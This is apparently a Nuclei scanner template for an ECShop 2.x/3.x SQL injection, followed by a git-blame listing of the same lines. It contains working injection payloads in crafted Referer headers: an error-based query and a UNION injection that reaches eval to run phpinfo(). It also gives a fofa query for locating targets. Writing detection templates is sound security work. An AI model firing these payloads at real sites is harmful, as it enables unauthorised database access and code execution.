nuclei-templates/vulnerabilities/other/ecshop-sqli.yaml

id: ecshop-sqli

info:
  name: ECShop 2.x/3.x SQL Injection
  author: Lark-lab,ImNightmaree,ritikchaddha
  severity: high
  description: |
    The vulnerability affects ECShop 2.x and 3.x versions allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field,and later via SQL injection vulnerability to malicious code injected into the dangerous eval function in order to achieve arbitrary code execution.
  reference:
    - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
    - http://www.wins21.com/mobile/blog/blog_view.html?num=1172
    - https://www.shutingrz.com/post/ad_hack-ec_exploit/
  metadata:
    verified: true
    fofa-query: app="ECShop"
  tags: sqli,php,ecshop

requests:
  - raw:
      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        words:
          - 'XPATH syntax error:'
          - '[error] =>'
          - '[0] => Array'
          - 'MySQL server error report:Array'
        condition: and

      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and
Update and rename ecshop-sql.yaml to ecshop-sqli.yaml 2021-11-08 08:12:13 +00:00			`id: ecshop-sqli`

Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00			`info:`
Update ecshop-sqli.yaml 2022-05-18 19:21:53 +00:00			`name: ECShop 2.x/3.x SQL Injection`
Update ecshop-sqli.yaml 2022-05-18 09:20:12 +00:00			`author: Lark-lab,ImNightmaree,ritikchaddha`
Update and rename ecshop-sql.yaml to ecshop-sqli.yaml 2021-11-08 08:12:13 +00:00			`severity: high`
Update ecshop-sqli.yaml 2022-05-23 10:43:10 +00:00			`description: \|`
			`The vulnerability affects ECShop 2.x and 3.x versions allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field,and later via SQL injection vulnerability to malicious code injected into the dangerous eval function in order to achieve arbitrary code execution.`
Update and rename ecshop-sql.yaml to ecshop-sqli.yaml 2021-11-08 08:12:13 +00:00			`reference:`
			`- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a`
			`- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html`
Update ecshop-sqli.yaml 2022-05-18 09:20:12 +00:00			`- http://www.wins21.com/mobile/blog/blog_view.html?num=1172`
Update ecshop-sqli.yaml 2022-05-18 09:36:50 +00:00			`- https://www.shutingrz.com/post/ad_hack-ec_exploit/`
Update ecshop-sqli.yaml 2022-05-23 10:43:10 +00:00			`metadata:`
			`verified: true`
			`fofa-query: app="ECShop"`
misc updates 2021-11-08 10:15:54 +00:00			`tags: sqli,php,ecshop`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00
Update ecshop-sql.yaml 2021-11-07 02:30:38 +00:00			`requests:`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00			`- raw:`
Update ecshop-sql.yaml 2021-11-07 02:36:28 +00:00			`- \|`
Update and rename ecshop-sql.yaml to ecshop-sqli.yaml 2021-11-08 08:12:13 +00:00			`GET /user.php?act=login HTTP/1.1`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
			`Referer: 554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}`
Update ecshop-sqli.yaml 2022-05-18 09:23:08 +00:00
Update ecshop-sqli.yaml 2022-05-18 09:20:12 +00:00			`- \|`
			`GET /user.php?act=login HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
Update ecshop-sqli.yaml 2022-05-23 10:43:10 +00:00			`Referer: 554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:"num";s:107:"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/";}554fcae493e564ee0dc75bdf2ebf94ca`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00
Update ecshop-sqli.yaml 2022-05-23 10:43:10 +00:00			`stop-at-first-match: true`
Update ecshop-sqli.yaml 2022-05-18 09:20:12 +00:00			`matchers-condition: or`
Create ecshop-sql.yaml 2021-11-07 02:03:09 +00:00			`matchers:`
			`- type: word`
			`words:`
Update ecshop-sqli.yaml 2021-11-08 08:12:44 +00:00			`- 'XPATH syntax error:'`
Update and rename ecshop-sql.yaml to ecshop-sqli.yaml 2021-11-08 08:12:13 +00:00			`- '[error] =>'`
			`- '[0] => Array'`
			`- 'MySQL server error report:Array'`
Linting 2021-11-07 02:39:21 +00:00			`condition: and`
Update ecshop-sqli.yaml 2022-05-18 09:20:12 +00:00
			`- type: word`
			`words:`
			`- "PHP Extension"`
			`- "PHP Version"`
			`condition: and`